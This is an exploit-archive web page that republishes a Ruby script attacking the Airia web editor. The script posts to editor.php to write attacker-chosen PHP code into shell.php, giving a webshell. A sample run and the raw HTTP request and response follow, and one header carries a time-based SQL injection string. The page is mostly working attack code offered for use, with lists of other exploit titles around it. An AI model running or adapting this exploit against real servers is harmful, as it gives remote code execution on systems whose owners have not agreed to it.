首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Airia - Webshell Upload Exploit 来源：www.hahwul.com 作者：HaHwul 发布时间：2016-06-21   # Exploit Title: Airia - Webshell Upload Vulnerability # Date: 2016-06-20 # Exploit Author: HaHwul # Exploit Author Blog: www.hahwul.com # Vendor Homepage: http://ytyng.com # Software Link: https://github.com/ytyng/airia/archive/master.zip # Version: Latest commit # Tested on: Debian [wheezy]   require "net/http" require "uri"   if ARGV.length !=2 puts "Airia Webshell Upload Exploit(Vulnerability)" puts "Usage: #>ruby airia_ws_exploit.rb [targetURL] [phpCode]" puts "  targetURL(ex): http://127.0.0.1/vul_test/airia" puts "  phpCode(ex): echo 'zzzzz'" puts "  Example : ~~.rb http://127.0.0.1/vul_test/airia 'echo zzzz'" puts "  exploit & code by hahwul[www.hahwul.com]"   else   target_url = ARGV[0]    # http://127.0.0.1/jmx2-Email-Tester/ shell = ARGV[1]    # PHP Code exp_url = target_url + "/editor.php" uri = URI.parse(exp_url) http = Net::HTTP.new(uri.host, uri.port)   request = Net::HTTP::Post.new(uri.request_uri) request["Accept"] = "*/*" request["User-Agent"] = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)" request["Connection"] = "close" request["Referer"] = "http://127.0.0.1/vul_test/airia/editor.php?file=1&group=%281%20AND%20%28SELECT%20SLEEP%2830%29%29%29%20--%20" request["Accept-Language"] = "en" request["Content-Type"] = "application/x-www-form-urlencoded" request.set_form_data({"mode"=>"save",""=>"","file"=>"shell.php","scrollvalue"=>"","contents"=>"<?php echo 'Airia Webshell Exploit';#{shell};?>","group"=>"vvv_html"}) response = http.request(request)   puts "[Result] Status code: "+response.code puts "[Result] Open Browser: "+target_url+"/data/vvv_html/shell.php" end   =begin ### Run Step.   #> ruby 3.rb http://127.0.0.1/vul_test/airia "echo 123;" [Result] Status code: 302 [Result] Open Browser: http://127.0.0.1/vul_test/airia/data/vvv_html/shell.php   output: Airia Webshell Exploit123   ### HTTP Request / Response [Request] POST /vul_test/airia/editor.php HTTP/1.1 Host: 127.0.0.1 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: http://127.0.0.1/vul_test/airia/editor.php?file=1&group=%281%20AND%20%28SELECT%20SLEEP%2830%29%29%29%20--%20 Content-Type: application/x-www-form-urlencoded Content-Length: 65 Cookie: W2=dgf6v5tn2ea8uitvk98m2tfjl7; DBSR_session=01ltbc0gf3i35kkcf5f6o6hir1; __utma=96992031.1679083892.1466384142.1466384142.1466384142.1; __utmb=96992031.2.10.1466384142; __utmc=96992031; __utmz=96992031.1466384142.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)   mode=save&file=1.php&scrollvalue=&contents=<?php echo "Attack OK."?>&group=vvv_html   [Response] Uloaded file http://127.0.0.1/vul_test/airia/data/vvv_html/1.html =end   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Airia - (Add Content) CSRF ·Internet Explorer 11 - Garbage ·Tomabo MP4 Player 3.11.6 - SEH ·Bansee 2.6.2 Buffer Overflow ·WordPress Ultimate Product Cat ·DarkComet Server 3.2 Remote Fi ·WordPress Premium SEO Pack 1.9 ·PCMAN FTP 2.0.7 - ls Command B ·Skype For Business 2013 User E ·Wolf CMS 0.8.2 - Arbitrary Fil ·phpATM 1.32 - Remote Command E ·Prestashop modules Arbitrary F   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved